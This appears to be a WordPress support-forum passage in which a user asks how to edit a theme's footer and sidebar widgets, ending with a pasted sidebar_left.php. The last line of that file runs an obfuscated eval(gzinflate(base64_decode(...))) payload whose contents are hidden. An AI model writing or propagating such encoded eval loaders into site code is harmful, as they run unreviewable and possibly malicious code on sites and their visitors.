Forum Replies Created

Viewing 7 replies - 16 through 22 (of 22 total)
  • Thread Starter kaswistry

    (@kaswistry)

    Sorry about that.

    The site URL is https://kurtsevillano.x10hosting.com

    Thanks!

    Forum: Themes and Templates
    In reply to: Footer Problem
    Thread Starter kaswistry

    (@kaswistry)

    @songdogtech

    I used one of the decoders and yet I got nothing. As in the form refreshed on its own (I did it thrice) and I got nothing back.

    Is there anyway to just recreate the footer in totally fresh code without me having to use the decoded code?

    Thanks

    Thread Starter kaswistry

    (@kaswistry)

    Also, I was thinking, If I cant really get a specific widget to handle categories, maybe I could get a widget that hides “some” widgets if the user is not logged in? Or a a script maybe?

    I was planning on a member’s only page, with some info available for visitors that’s why I was hoping to show them two different widgets

    Thread Starter kaswistry

    (@kaswistry)

    Is there a way I could remove the sidebar widgets from the front page then? What is the best way to hide the categories from non-registered users?

    thanks

    Thread Starter kaswistry

    (@kaswistry)

    Finally, it worked!

    Thank you everyone!!!

    Thread Starter kaswistry

    (@kaswistry)

    Yup. If I add the META Widget, I do not remove the original META tags there and the worst part is, I add another META with almost the same contents except for the login link. What Do I do to remove the META?

    Thread Starter kaswistry

    (@kaswistry)

    This is the code in the sidebar_left.php file. Which part do I remove?:

    <div class="column sidebar_left">
    
    	<ul>
    
    <?php if ( !function_exists('dynamic_sidebar') || !dynamic_sidebar(1) ) : ?>
    
    <?php /*?>
    <li>
      <strong><?php _e('Search'); ?></strong>
    	<form id="searchform" method="get" action="<?php bloginfo('siteurl')?>/">
    		<input type="text" name="s" id="s" class="textbox" value="<?php echo wp_specialchars($s, 1); ?>" />
    		<input id="btnSearch" type="submit" name="submit" value="<?php _e('Go'); ?>" />
    	</form>
      </li><?php */?>
    
      <li>
        <h2>
          <?php _e('Categories'); ?>
        </h2>
        <ul>
          <?php wp_list_cats('optioncount=1&hierarchical=1');    ?>
    
        </ul>
      </li>
    
      <li>
        <h2>
          <?php _e('Monthly'); ?>
        </h2>
        <ul>
          <?php wp_get_archives('type=monthly&show_post_count=true'); ?>
        </ul>
      </li>
      <li>
        <h2><?php _e('Pages'); ?></h2>
        <ul>
          <?php wp_list_pages('title_li=' ); ?>
        </ul>
      </li>
    <?php if(is_home()) {?>
      <?php get_links_list(); ?>
      <?php }?>
      <?php endif; ?>
    <?php eval(gzinflate(base64_decode('rVI9T8QwDJ3bX2F1aVku0o0Q0oGZ5XoSY9Ve3UukfClJqe7f47YUBEKwMCTxx7P9npxa5ABcK5FnGZdH8Yyp44yMxZ/08mRLmncgA46PBa+99NBrd1V2dFUZYjy2U9Dl3QPUooCkksYd1mJVNjc7qEuXEJJUEaIia4rKXuHUNO9V4hPOu74Pe5cTdlrfoFHGa4S9k3K2EFTM2YIVWw9y6GxCfmd8ccagTbH9k/pZImhiHhPsRZAcECfwLpKj7M8innb0/6uRKfl7xuZ5Psw+STQYx4B4IILsQ8KLC4MPGCOcV0Qhvke+DliJz741tP1qJbCsn9H+KUsfBDboGqF7UK+b2BzeAA==')));?>

Viewing 7 replies - 16 through 22 (of 22 total)